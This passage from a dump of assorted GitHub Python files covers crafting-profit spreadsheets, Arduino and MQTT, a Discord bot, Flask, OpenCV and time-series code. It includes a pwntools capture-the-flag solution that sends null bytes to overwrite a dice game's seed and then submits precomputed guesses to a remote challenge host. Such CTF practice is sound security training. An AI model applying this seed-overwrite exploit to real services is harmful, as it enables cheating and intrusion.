profitable_items, recipes_map):\n profitable_items = [e for e in profitable_items if e.profit != 0]\n data = []\n for profitable_item in profitable_items:\n item_id = profitable_item.id\n item = items_map[item_id]\n recipe = recipes_map[item_id]\n\n item_data = {\n 'id': item_id,\n 'name': item.name,\n 'rarity': item.rarity,\n 'disciplines': format_disciplines(recipe.disciplines),\n 'profit': profitable_item.profit,\n 'crafting_cost': profitable_item.crafting_cost,\n 'count': profitable_item.count,\n 'avg_profit_per_item': profit_per_item(profitable_item),\n 'roi': float(profit_on_cost(profitable_item)),\n 'link': f\"\"\"=HYPERLINK(\"https://www.gw2bltc.com/en/item/{item.id}\")\"\"\",\n # TODO: This returns the \"total\" minimal sell price instead of the minimal sell price per item\n 'profitability_threshold': profitable_item.profitability_threshold,\n 'time_gated': profitable_item.time_gated,\n 'needs_ascended': profitable_item.needs_ascended,\n 'craft_level': recipe.min_rating,\n 'recipe': json.dumps(format_json_recipe(profitable_item, items_map), indent=2)\n }\n\n data.append(item_data)\n return data\n\n\ndef export_csv(profitable_items: List[ProfitableItem],\n items_map: Dict[int, Item],\n recipes_map: Dict[int, Recipe]) -> None:\n logger.info(\"Exporting profitable items as CSV\")\n data = generate_export_rows(items_map, profitable_items, recipes_map)\n if len(data) == 0:\n logger.warning(\"Could not find any profitable item to export\")\n return\n\n with open('export.csv', 'w', newline='') as csvfile:\n datawriter = csv.writer(csvfile, delimiter=',', quotechar='\"')\n datawriter.writerow(data[0].keys())\n\n for item_data in data:\n datawriter.writerow(item_data.values())\n\n\ndef get_series_letter(name: str, data: List[dict]) -> str:\n return get_column_letter(list(data[0].keys()).index(name) + 1)\n\n\ndef as_text(value):\n if value is None:\n return \"\"\n return str(value)\n\n\ndef export_excel(profitable_items: List[ProfitableItem],\n items_map: Dict[int, Item],\n recipes_map: Dict[int, Recipe],\n time_gated: bool = False,\n needs_ascended: bool = False) -> None:\n logger.info(\"Exporting profitable items as Excel spreadsheet\")\n data = generate_export_rows(items_map, profitable_items, recipes_map)\n if len(data) == 0:\n logger.warning(\"Could not find any profitable item to export\")\n return\n\n wb = Workbook()\n ws = wb.active\n\n # add column headings. NB. these must be strings\n ws.append(list(data[0].keys()))\n for row in data:\n if (time_gated or not row['time_gated']) and (needs_ascended or not row['needs_ascended']):\n ws.append(list(row.values()))\n\n tab = Table(displayName=\"Data\", ref=\"A1:\" + get_column_letter(ws.max_column) + str(ws.max_row))\n\n # Add a default style with striped rows and banded columns\n style = TableStyleInfo(name=\"TableStyleMedium9\", showFirstColumn=False,\n showLastColumn=False, showRowStripes=True, showColumnStripes=True)\n tab.tableStyleInfo = style\n\n ws.add_table(tab)\n\n # Applies formatting (format can only be applied to single cells)\n for col_name, number_format in {'profit': r\"#\\,##\\,##\",\n 'crafting_cost': r\"#\\,##\\,##\",\n 'avg_profit_per_item': r\"#\\,##\\,##\",\n 'roi': '0.00%',\n 'profitability_threshold': r\"#\\,##\\,##\"}.items():\n col_letter = get_series_letter(col_name, data)\n\n for i in range(1, ws.max_row + 1):\n ws[f\"{col_letter}{i}\"].number_format = number_format\n\n # Adjusts column width\n col_dim = [\n ('id', 8),\n ('name', 30),\n ('rarity', 5),\n ('disciplines', 10),\n ('profit', 10),\n ('crafting_cost', 11),\n ('count', 10),\n ('avg_profit_per_item', 8),\n ('roi', 7),\n ('link', 5),\n ('profitability_threshold', 8),\n ('time_gated', 7),\n ('needs_ascended', 7),\n ('craft_level', 5),\n ('recipe', 80)\n ]\n for i, column_cells in enumerate(ws.columns):\n ws.column_dimensions[column_cells[0].column_letter].width = col_dim[i][1]\n\n wb.save(\"export.xlsx\")\n","repo_name":"Ziink4/Arbitrageur","sub_path":"arbitrageur/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":6725,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"41950920052","text":"from pyfirmata import Arduino, util\nimport pyfirmata\nfrom time import sleep\n\nfrom mqtt_lib import Communicator\n\nboard = Arduino('/dev/serial/by-id/usb-1a86_USB2.0-Serial-if00-port0') # Nano\n#board = Arduino('/dev/serial/by-id/usb-Arduino__www.arduino.cc__0043_55432333038351E0F022-if00') # Uno\nprint('Connected')\n\n\nvalue = board.get_pin('d:4:i') # type: pyfirmata.Pin\n\nit = util.Iterator(board)\nit.start()\nboard.iterate()\n\nPIN_MODE_PULLUP = 0x0B\n\nmsg = bytearray([pyfirmata.SET_PIN_MODE, value.pin_number, PIN_MODE_PULLUP])\nvalue.board.sp.write(msg)\n\nc = Communicator()\n\nwhile True:\n input = value.read()\n if input == True:\n print('Switch is High')\n c.send_message(True, True)\n else:\n print('Switch is Low')\n c.send_message(False, False)\n sleep(0.1)\n# for i in range (1000):\n# print('Switch State: %s')% value.read()\n# if str(value.read()) == 'True':\n# print('High')\n# if str(value.read()) == 'False':\n# print('Low')\n#print(value.read())\n # if(dig_pin.read()== 1):\n # print('High')\n # if (dig_pin.read()== 0):\n # print('Low')\n\nboard.exit()","repo_name":"OlinSibbSquad/oh-shoot","sub_path":"Switch.py","file_name":"Switch.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"25474384977","text":"import random\nimport math\nimport os\n\nbase_list = [\"Laitue\", \"Mesclun\", \"Mâche\", \"Pousse d'épinard\", \"Roquette\", \"Fusilli/Mesclun\", \"Riz/Roquette\",\n \"Quinoa Boulgour/Roquette\", \"Fusili\", \"Riz\"]\ningredients_list = [\"Melon\", \"Ananas\", \"Aubergines\", \"Concombres\", \"Falafel\", \"Champignons\", \"Courgettes\", \"Mais\", \"Oignons rouges\", \"Poivrons\",\n \"Tomates cerises allongees\", \"Tomates cerises confites\", \"Edamame\", \"Olives vertes\", \"Emmental\",\"Feta\", \"Fromage de chevre\", \"Roquefort\",\n \"Grana Padano\", \"Mozzarella\", \"Mozarella di Bufala\", \"Tomme de brebis\", \"Mimolette\", \"Oeuf Poche\",\"Jambon blanc\", \"Jambon de pays\", \"Bacon grille\",\n \"Anchois\", \"Crevettes\", \"Surimi\", \"Saumon Fume\", \"Thon\", \"Crouton\", \"Graines\", \"Noix\"]\nsauce_list = [\"Moutarde a l'ancienne\", \"Miel Moutarde\", \"Ranch\", \"Olive balsamique\", \"Soja\", \"Tomates basilic\",\n \"Olive citron\", \"Pesto\", \"Agrumes\", \"Curry Coco\"]\nnb_ingr = 4\n\n\ndef mixer (list):\n i = random.randint(0, len(list) - 1)\n return list[i]\n\n\ndef display(base, sauce, ingredients):\n print(\n \"++++VOTRE SALADE EST PRETE+++++\\nBase: \", base,\n \"\\nSauce: \", sauce, \"\\nIngredients: \"\n )\n for i in ingredients:\n print(\" \", i)\n return 0\n\n\ndef formule ():\n foo = input(\"Combien d'ingredients dans la salade ? (4/6): \")\n if int(foo) == 4 or int(foo) == 6:\n global nb_ingr\n nb_ingr = int(foo)\n os.system('cls')\n menu()\n else:\n print(\"\\nMerci de choisir entre 4 ou 6 ingredients\")\n formule()\n\n\ndef menu ():\n while True:\n os.system('cls')\n print(\"++++ SaladMixrr1.0 ++++\\n\"\n \"Formule: \", nb_ingr, \" ingredients\\n\"\n \"1. Changer la quantite d'ingredients\\n\"\n \"2. Mixer !\\n\"\n \"3. Quitter\\n\"\n )\n saisie = int(input(\"Choisissez une option: \"))\n if saisie == 1:\n return formule()\n if saisie == 2:\n os.system('cls')\n recette()\n break\n if saisie == 3:\n print(\"Bye !\")\n return 0\n else:\n menu()\n\n\ndef recette ():\n base = mixer(base_list)\n ingredients = [mixer(ingredients_list)]\n sauce = [mixer(sauce_list)]\n switch = True\n while len(ingredients) < nb_ingr:\n foo = mixer(ingredients_list)\n for i in ingredients:\n if foo == i:\n switch = False\n if switch:\n ingredients.append(foo)\n else:\n switch = True\n display(base, sauce, ingredients)\n waiter()\n\n\ndef waiter ():\n happy = input(\"\\nSatisfait ? Y/N/(M)enu: \")\n if (happy.upper() == \"Y\"):\n print(\"Yummy !\")\n return 0\n if (happy.upper() == \"N\"):\n os.system('cls')\n return recette()\n if (happy.upper() == \"M\"):\n os.system('cls')\n return menu()\n else:\n print(\"Reponse invalide\")\n waiter()\n\n\nif __name__ == '__main__' :\n menu()\n","repo_name":"0xPhantasia/EatSaladRandomizer","sub_path":"SaladMixrr.py","file_name":"SaladMixrr.py","file_ext":"py","file_size_in_byte":2953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"32842426789","text":"import cv2\nimport CameraReaderAsync\n\n# Initialize\ndebugMode = True\ncamera = cv2.VideoCapture(0)\ncamera.set(cv2.cv.CV_CAP_PROP_FRAME_WIDTH, 640)\ncamera.set(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT, 480)\ncameraReader = CameraReaderAsync.CameraReaderAsync(camera)\n\n# Main Loop\nframesToProcess = 60 * 5\nwhile debugMode or framesToProcess >= 0:\n raw = cameraReader.Read()\n if raw is not None:\n framesToProcess -= 1\n if debugMode:\n cv2.imshow(\"raw\", raw)\n\n if debugMode:\n keyPress = cv2.waitKey(1)\n if keyPress == ord(\"q\"):\n break\n \n# Cleanup\ncameraReader.Stop()\ncamera.release()\ncv2.destroyAllWindows()\n","repo_name":"AluminatiFRC/Vision2016","sub_path":"multiproc-test.py","file_name":"multiproc-test.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
+{"seq_id":"12378975341","text":"#!/usr/bin/env python2\n\nfrom pwn import *\nfrom qpwn import *\ncontext(os='linux', log_level='debug')\ncontext.arch = 'amd64'\ncontext.terminal = ['tmux', 'splitw', '-h']\n\nif args.INFO:\n context.log_level = 'info'\n \nDEBUG = not args.REMOTE and not args.TEST\nif args.REMOTE:\n p = remote('111.198.29.45', 52224)\nelif args.TEST:\n p = process('./pwn', env={'LD_PRELOAD': './libc.so.6'})\nelse:\n p = process('./pwn')\nelf = ELF('./pwn')\ninit(p, elf, context, args)\nmake_alias(p)\n\ndef guess(ans):\n p.sla('Give me the point(1~6):', str(ans))\n\nif __name__ == '__main__':\n p.sla('name', '\\x00' * 0x50)\n ls = [2,5,4,2,6,2,5,1,4,2,3,2,3,2,6,5,1,1,5,5,6,3,4,4,3,3,3,2,2,2,6,1,1,1,6,4,2,5,2,5,4,4,4,6,3,2,3,3,6,1]\n for i in ls:\n guess(i)\n p.i()\n","repo_name":"qaqmander/ctf-history","sub_path":"xman_execrise/pwn/dice_game/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"25691925283","text":"import discord\r\nimport random\r\nimport sys\r\n\r\n\r\nclient = discord.Client()\r\nrandom_greeting = [\"Hello\", \"Hi\", \"YO!\", \"Sup!\"]\r\nrandom_answer = [\"Maybe\", \"Try again later\", \"Sure\", \"Definitely\", \"I doubt that\", \"Yes\", \"No\", \"No chance for that to happen\"]\r\n\r\n\r\n\r\n@client.event\r\nasync def on_ready():\r\n print(f\"We have logged in as {client.user}\")\r\n '''\r\n Use this if you want to find the id of a custom emoji so you can use it as an reaction\r\n for emoji in client.emojis:\r\n print(emoji.id)\r\n print(emoji.name)'''\r\n\r\n\r\n\r\n@client.event\r\nasync def on_message(message):\r\n print(f\"{message.channel}: {message.author}: {message.author.name}: {message.content}\")\r\n \r\n if message.author == client.user:\r\n return\r\n \r\n if \"hello\" in message.content.lower():\r\n await message.channel.send(random.choice(random_greeting))\r\n\r\n if \"happy birthday\" in message.content.lower():\r\n await message.channel.send(\"Happy Birthday!\")\r\n\r\n if \"!byebot\" in message.content.lower():\r\n await client.close()\r\n sys.exit()\r\n\r\n if \"!tellmebot\" in message.content.lower():\r\n await message.channel.send(random.choice(random_answer))\r\n\r\n '''if \"trigger\" in message.content.lower():\r\n emoji = client.get_emoji(emojiid)\r\n await message.add_reaction(emoji)'''\r\n\r\n \r\n\r\nclient.run(\"your token goes here\")","repo_name":"StaVergos/discord.py","sub_path":"discordbot.py","file_name":"discordbot.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"9121315402","text":"#display the message\nprint(\"How many numbers should i sum up?\")\nmax_numbers = int(input())\n\n#variable to control the loop\ncount = 0\n\nprint()\n\n#total of summed number\ntotal = 0\n\nwhile count < max_numbers:\n print(f\"please enter a number {count + 1} of {max_numbers}:\")\n number = int(input())\n total = total + number\n count = count + 1\nprint(f\"the answer is {total}\")","repo_name":"beniewaku/com728","sub_path":"basics/repetitions/while_loop/sum_user_numbers.py","file_name":"sum_user_numbers.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"279718613","text":"import json\r\nimport os\r\nimport tensorflow as tf \r\nimport numpy as np \r\n\r\ndef load_json_file(file_path: str):\r\n \"\"\"\r\n Load json file by file path\r\n :param file_path: path to json file\r\n :return: json object\r\n \"\"\"\r\n assert os.path.exists(file_path), \"{} is not existed\".format(file_path)\r\n with open(file_path) as f:\r\n json_file = json.load(f)\r\n return json_file\r\n\r\ndef predict(data: np.ndarray, model: tf.keras.Model) -> np.ndarray:\r\n \"\"\"\r\n Perform prediction on specific model\r\n :param data: data for prediction\r\n :param model: DL model for prediction\r\n :return:\r\n \"\"\"\r\n results = model.predict(data.reshape(-1, 28, 28, 1))\r\n # clear up session\r\n tf.keras.backend.clear_session()\r\n return results\r\n\r\ndef sort_by_confidence_then_filter_top_n(prediction_results: np.ndarray, top_n: int) -> np.ndarray:\r\n \"\"\"\r\n - sort the prediction by confidences score\r\n - flip it from highest to lowest\r\n - filter out top N predictions\r\n - stack them back together\r\n :param prediction_results:\r\n :param top_n:\r\n :return:\r\n \"\"\"\r\n result_argsort = np.flip(prediction_results.argsort()[:, -top_n:], 1)\r\n result_sort = np.flip(np.sort(prediction_results)[:, -top_n:], 1)\r\n result_stack = np.dstack((result_argsort, result_sort))\r\n return result_stack\r\n ","repo_name":"anoyo-lin/digits_ocr","sub_path":"gene/digits_ocr/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"2452630550","text":"import numpy as np\nimport pandas as pd\nimport csv\nimport cv2\nimport matplotlib.pyplot as plt\nimport datetime\n\n##########\n# global variables\nfigure, ax = plt.subplots(nrows=2, ncols=1, sharex=True, figsize=(8, 6))\ndrawing = False\nx0=0\ny0=0\nx1=0\ny1=0\n# global variables\n##########\n\n\ndef resize_img(img):\n # print('Original Dimensions : ',img.shape)\n \n scale = 10 # percent of original size\n width = int(img.shape[1] * scale)\n height = int(img.shape[0] * scale)\n dim = (width, height)\n \n # resize image\n resized = cv2.resize(img, dim, interpolation = cv2.INTER_AREA)\n \n # print('Resized Dimensions : ',resized.shape)\n return resized\n\n\ndef average_data(df_head, raw_data):\n # averaging of frames per second; 2 or 3 FPS (2Hz or 3Hz) will become 1 FPS 1Hz\n\n data_mean=np.array([],dtype=float).reshape(0, raw_data.shape[1], raw_data.shape[2])\n data_time=[]\n\n id_sel=0\n # print(len(raw_data))\n while id_sel < len(raw_data):\n sel_hour=df_head['hour'].values[id_sel]\n # print(\"df['hour'].values[0]: \", sel_hour)\n \n hour_splitted = datetime.datetime.strptime(sel_hour, \"%H:%M:%S.%f\")\n h=hour_splitted.hour\n m=hour_splitted.minute\n s=hour_splitted.second\n\n h_inf =str(h).zfill(2)\n m_inf =str(m).zfill(2)\n s_inf =str(s).zfill(2)\n \n if s+1==60:\n s_sup=str(0).zfill(2)\n if m+1==60:\n m_sup=str(0).zfill(2)\n h_sup=str(h+1).zfill(2)\n else:\n m_sup=str(m+1).zfill(2)\n h_sup=str(h).zfill(2)\n else:\n s_sup=str(s+1).zfill(2)\n m_sup=str(m).zfill(2)\n h_sup=str(h).zfill(2)\n \n # u_sec = str(hour_splitted.microsecond)\n # print(hour+':'+min+':'+sec_inf+'.'+u_sec)\n\n lim_inf = h_inf+':'+m_inf+':'+s_inf\n lim_sup = h_sup+':'+m_sup+':'+s_sup\n\n # print('lim_inf, lim_sup: ', lim_inf, lim_sup)\n\n idx_s = df_head.loc[(df_head['hour']>= lim_inf) & (df_head['hour']=time_ini) & (df_chest[' Time']<=time_end)]\n df_thigh_a = df_thigh.loc[(df_thigh[' Time']>=time_ini) & (df_thigh[' Time']<=time_end)]\n \n # activate interactive mouse actions on window\n cv2.namedWindow('image')\n cv2.setMouseCallback('image',mouse_interact)\n\n # to run GUI event loop\n plt.ion()\n plt.show()\n\n id_frame=0\n exit_key=False\n flag =True\n flag_start=True\n\n\n while (exit_key==False) and (id_frame 255.0]=255.0\n s_f = s_f.astype(np.uint8)\n s_f=resize_img(s_f)\n \n colormap = plt.get_cmap('plasma')\n heatmap = (colormap(s_f) * 2**16).astype(np.uint16)[:,:,:3]\n heatmap = cv2.cvtColor(heatmap, cv2.COLOR_RGB2BGR)\n\n cv2.imshow('image',heatmap)\n\n # plot_actigraphy(df_chest_a.iloc[0:id_frame][vec_mag].to_numpy(), df_thigh_a.iloc[0:id_frame][vec_mag].to_numpy())\n plot_actigraphy(df_chest_a[vec_mag].to_numpy(), df_thigh_a[vec_mag].to_numpy(), id_frame)\n\n if flag_start == True:\n pressed_key = cv2.waitKey(0) # miliseconds\n flag_start=False\n else:\n pressed_key = cv2.waitKey(100) # miliseconds\n\n if pressed_key == ord('a'):\n print (\"pressed a\")\n exit_key=True\n else:\n print('id frame: ', id_frame, df_f.iloc[id_frame]['time_stamp'])\n id_frame+=1\n \n cv2.waitKey(0)\n cv2.destroyAllWindows()\n","repo_name":"gtibap/actigraph_hscm","sub_path":"scripts/interface_pressure_visualization_2.py","file_name":"interface_pressure_visualization_2.py","file_ext":"py","file_size_in_byte":6786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"24157699854","text":"import os\nimport time\n\nfrom celery import Celery\n\n\ncelery = Celery(__name__)\ncelery.conf.broker_url = os.environ.get(\n \"CELERY_BROKER_URL\", \"redis://localhost:6379\")\ncelery.conf.result_backend = os.environ.get(\n \"CELERY_RESULT_BACKEND\", \"redis://localhost:6379\")\n\n# celery task\n\n\n@celery.task(name='add')\ndef add(x, y):\n return x + y\n","repo_name":"Shebeli/BattleShipPy","sub_path":"api/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"4389909428","text":"#!/usr/bin/python3\n\ndef list_division(my_list_1, my_list_2, list_length):\n \"\"\"\n Performs contigeous divisions\n Args:\n my_list_1: first list\n my_list_2: divisors\n list_length: length of lists\n Returns: List of divisions\n \"\"\"\n divs = []\n for i in range(0, list_length):\n try:\n fraction = my_list_1[i] / my_list_2[i]\n except TypeError:\n print(\"wrong type\")\n fraction = 0\n except ZeroDivisionError:\n print(\"division by 0\")\n fraction = 0\n except IndexError:\n print(\"out of range\")\n fraction = 0\n finally:\n divs.append(fraction)\n return divs\n","repo_name":"sayyid211/alx-higher_level_programming_0","sub_path":"0x05-python-exceptions/4-list_division.py","file_name":"4-list_division.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"8685177755","text":"# Define a function to print out messages one by one\ndef question1():\n \"\"\"The first question bot ask user\"\"\"\n # Create a tuple of the messages for question 1\n question_1 = ((\"Hi! Welcome to Tyler's Repair shop.\"),\n ('What can I help you with? (please chose 1, 2, or 3)'),\n ('1. Make an appointment'),\n ('2. Check your appointment'),\n ('3. Cancel your appointment'))\n for i in question_1:\n print(i)\n\n# Define a function to print out messages one by one \ndef question11():\n \"\"\"The second question bot ask user\"\"\"\n #Create a tuple of the messages for the second question when user give answer \"1\" in question 1.\n question_1_1 = (('What kind of service do you need?(please chose 1, 2, or 3)'),\n ('1. Tire replacement'),\n ('2. Bumper replacement'),\n ('3. Light replacement'))\n for i in question_1_1:\n print(i)\n\n# Write a funtion to make different appointments use add_appointment method of the class reservation_list\ndef add_appoint():\n \"\"\"add appointment for user with method created\"\"\"\n from my_module.reservation import reservation_list as p\n from my_module.reservation import remove_key\n r = p()\n # Define the third question after user choose the answers from second question\n question_1_1_1 = ('Please enter the appointment time you want to make (please choose the number)')\n # Ask the second question\n question11()\n # Let user answer the question\n msg1_1 = input('INPUT :\\t')\n \n # If the answer is '1', show user the avaliable times\n if msg1_1 == '1':\n print(question_1_1_1)\n r.check_avaliable()\n # Add an appointment using add_appointment method with job name 'Tire replacement'\n msg1_1_1 = input('INPUT :\\t')\n r.add_appointment('Tire replacement', msg1_1_1)\n \n # If the answer is '2', show user the avaliable times \n elif msg1_1 == '2':\n print(question_1_1_1)\n r.check_avaliable()\n # Add an appointment using add_appointment method with job name 'Bumper replacement'\n msg1_1_2 = input('INPUT :\\t')\n r.add_appointment('Bumper replacement', msg1_1_2)\n \n # If the answer is '3', show user the avaliable times\n elif msg1_1 == '3':\n print(question_1_1_1)\n r.check_avaliable()\n #Add an appointment using add_appointment method with job name 'Light replacement' \n msg1_1_3 = input('INPUT :\\t')\n r.add_appointment('Light replacement', msg1_1_3) \n \n # If the answer is unvalid, report error.\n else:\n print(\"Sorry, I can't understand you. please call (888)888-8888\")","repo_name":"brn016/cogs18","sub_path":"18 Projects/Project_yax048_attempt_2018-12-12-10-21-46_COGS 18 Final Project/COGS 18 Final Project/my_module/add_appointment.py","file_name":"add_appointment.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"24450336952","text":"from flask import Flask, render_template\nfrom faker import Faker\nimport random\n\nfake = Faker()\n\napp = Flask(__name__)\napplication = app\n\nimages = ['7d4e9175-95ea-4c5f-8be5-92a6b708bb3c',\n '2d2ab7df-cdbc-48a8-a936-35bba702def5',\n '6e12f3de-d5fd-4ebb-855b-8cbc485278b7',\n 'afc2cfe7-5cac-4b80-9b9a-d5c65ef0c728',\n 'cab5b7f2-774e-4884-a200-0c0180fa777f']\n\n\ndef generate_comments(replies=True):\n comments = []\n for i in range(random.randint(1, 3)):\n comment = { 'author': fake.name(), 'text': fake.text() }\n if replies:\n comment['replies'] = generate_comments(replies=False)\n comments.append(comment)\n return comments\n\n\ndef generate_post(i):\n return {\n 'title': 'Заголовок поста',\n 'author': fake.name(),\n 'text': fake.paragraph(nb_sentences=100),\n 'date': fake.date_time_between(start_date='-2y', end_date='now'),\n 'image_id': f'{images[i]}.jpg',\n 'comments': generate_comments()\n }\n\n\nposts_list = sorted([generate_post(i) for i in range(5)], key=lambda x: x['date'], reverse=True)\n\n\n@app.route('/')\ndef index():\n title = 'Главная!'\n return render_template('index.html', title=title)\n\n\n@app.route('/posts')\ndef posts():\n title = 'Посты!'\n return render_template('posts.html', title=title, posts=posts_list)\n\n\n@app.route('/post/')\ndef post(i):\n p = posts_list[i]\n return render_template('post.html', title=p['title'], post=p)\n\n\n@app.route('/about')\ndef about():\n title = 'Обо мне!'\n return render_template('about.html', message=title)\n","repo_name":"grigigo/webPython","sub_path":"lab1/papka/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"4202053346","text":"#!/usr/env python3\n# -*- coding: utf-8\n\nimport re\n\n\"\"\"\n1956 books\n1213 about\n6451 polit\n6451 religion\n6451 inpr\n6451 pmain\n6451 lmain\n5488 relat\n13655 status\n\n\n\"\"\"\n\ndef getMainInLife(x):\n if x == 1:\n return 'семья и дети'\n elif x == 2:\n return 'карьера и деньги'\n elif x == 3:\n return 'развлечения и отдых'\n elif x == 4:\n return 'наука и исследования'\n elif x == 5:\n return 'совершенствование мира'\n elif x == 6:\n return 'саморазвитие'\n elif x == 7:\n return 'красота и искусство'\n elif x == 8:\n return 'слава и влияние'\n\ndef getMainInPeople(x):\n if x == 1:\n return 'ум и креативность'\n elif x == 2:\n return 'доброта и честность'\n elif x == 3:\n return 'красота и здоровье'\n elif x == 4:\n return 'власть и богатство'\n elif x == 5:\n return 'смелость и упорство'\n elif x == 6:\n return 'юмор и жизнелюбие'\n\n\ndef getRelation(x):\n if x == 1:\n return \"не женат/не замужем\"\n elif x == 2:\n return \"есть друг/есть подруга\"\n elif x == 3:\n return \"помолвлен/помолвлена\"\n elif x == 4:\n return \"женат/замужем\"\n elif x == 5:\n return \"всё сложно\"\n elif x == 6:\n return \"в активном поиске\"\n elif x == 7:\n return \"влюблён/влюблена\"\n elif x == 8:\n return \"в гражданском браке\"\n elif x == 0:\n return \"не указано\"\n\ndef main():\n file_name = 'books'\n file_namee = 'hr/books'\n f = open(file_name+\".txt\", \"r\")\n books = f.read().lower()\n #clear = books.replace(\"none\", \"\").split(',')\n clear = re.findall(r'\\w+\\w+\\w+\\w+', books)\n\n set_clear = set(clear)\n\n statistics = ''\n for i in set_clear:\n if i.strip(' []'):\n #k = int(i.strip(' ]['))\n s = \"%s: %d\\n\" % (i, clear.count(i))\n statistics += s\n\n f = open(file_namee+\".txt\", 'w')\n f.write(str(statistics))\n f = open(file_namee+\".txt\", 'r')\n s = f.read().strip().split('\\n')\n stat = []\n for i in s:\n buf = i.split(\":\")\n if buf:\n d = []\n d.append(buf[0])\n d.append(int(buf[1]))\n stat.append(d)\n stat.sort(key=lambda k: k[1], reverse=True)\n\n f = open(file_namee+\".txt\", 'w')\n for i in stat:\n f.write(str(i))\n f.write('\\n')\n \"\"\"\n set_info = set(info)\n\n statistics = ''\n for i in set_info:\n s = \"%s: %d\\n\" % (i, info.count(i))\n statistics += s\n\n f = open(\"books_statistics.txt\", 'w')\n f.write(str(statistics))\n \"\"\"\n\n \"\"\"\n f = open(\"name_statistics.txt\", 'r')\n s = f.read().strip().split('\\n')\n stat = []\n for i in s:\n buf = i.split(\":\")\n if buf:\n d = []\n d.append(buf[0])\n d.append(int(buf[1]))\n stat.append(d)\n stat.sort(key=lambda k: k[1], reverse=1)\n\n f = open(\"name_statistics_sorted.txt\", 'w')\n for i in stat:\n f.write(str(i))\n f.write('\\n')\n \"\"\"\n\nif __name__ == '__main__':\n main()\n","repo_name":"Vault-1814/py_projects","sub_path":"vkautomation/stats/analizator.py","file_name":"analizator.py","file_ext":"py","file_size_in_byte":3386,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"9232269829","text":"import tkinter as tk\nfrom weatherApp import get_data\n\n\n\nclass HomePage():\n#creating window\n\n def __init__(self,master):\n\n self.master = master\n self.frame = tk.Frame(self.master)\n self.namePlace = tk.StringVar() \n self.label = tk.Label(master,text=\"Place name\")\n self.entry = tk.Entry(master,textvariable= self.namePlace)\n self.button = tk.Button(master,text=\"Submit\", command = lambda: self.display_data(self.dataDisplay,self.namePlace))\n self.dataDisplay = tk.Label(master,text=\"The result appear here\")\n self.label.pack()\n\n self.entry.pack()\n self.button.pack()\n self.dataDisplay.pack(pady=20)\n\n def display_data(self, dataDisplay,namePlace):\n\n data = get_data(namePlace) # Calling backend function to get data\n print(data)\n dataDisplay.config(text=data['cod']) # Update the label with the fetched data\n \ndef main():\n root=tk.Tk()\n app = HomePage(root)\n root.mainloop()\n \nif __name__ == \"__main__\":\n main()","repo_name":"alona26/Weather","sub_path":"mainGui.py","file_name":"mainGui.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"19199196020","text":"class Solution:\n def reverseBits(self, n: int) -> int:\n if (n == 0): return 0\n \n result = 0\n for i in range(32):\n result <<= 1\n if ((n & 1) == 1): \n result+=1\n n >>= 1\n return result","repo_name":"GabrielPlayer/leetcode","sub_path":"Algorithm/I/Day14/190ReverseBits.py","file_name":"190ReverseBits.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"37779136248","text":"import pandas as pd\nimport numpy as np\nimport os\nfrom SteelDemandAnalysis.data_process.steel_demand_data import steel_demand_data_initial\nfrom SteelDemandAnalysis.model.ARIMA import x13_arima\n\n\ndef analysis_entry():\n steel_demand = steel_demand_data_initial.SteelDemand()\n steel_df = steel_demand.steel_demand_data()\n steel_series = steel_df[steel_df.columns[0]]\n # steel_series.index = pd.to_datetime(steel_series.index)\n steel_series.index = pd.DatetimeIndex(start='2006-01-01', periods=161, freq='M')\n steel_series.name = 'TimeSeries'\n return steel_series\n\n\ndef read_df():\n f = open('E:\\\\htsc\\\\行业景气度\\\\数据\\\\模型数据\\\\converted_model_data.dat')\n data_df = pd.read_csv(f, header=0, index_col=0)\n return data_df\n\n\ndef fun():\n model = x13_arima.X13Arima('E:\\\\htsc\\\\行业景气度\\\\X13_ARIMA\\\\WinX13\\\\x13as\\\\x13as.exe')\n data_series = analysis_entry()[12:]\n user_params = read_df()\n user_params.index = data_series.index\n data_series.name = 'a'\n res = []\n for period in range(-60, 0, 1):\n time_series = data_series[:period]\n exog_df = user_params[:period + 1] if period != -1 else user_params\n exog_df.name = 'b'\n exog_df.columns = ['b1', 'b2', 'b3', 'b4', 'b5', 'b6',\n 'b7', 'b8', 'b9', 'b10', 'b11', 'b12']\n model.x13_arima_analysis(time_series, exog=exog_df, forecast_periods=1)\n y_pre = model.x13_forecast()\n res.append(y_pre[0])\n for i, k in 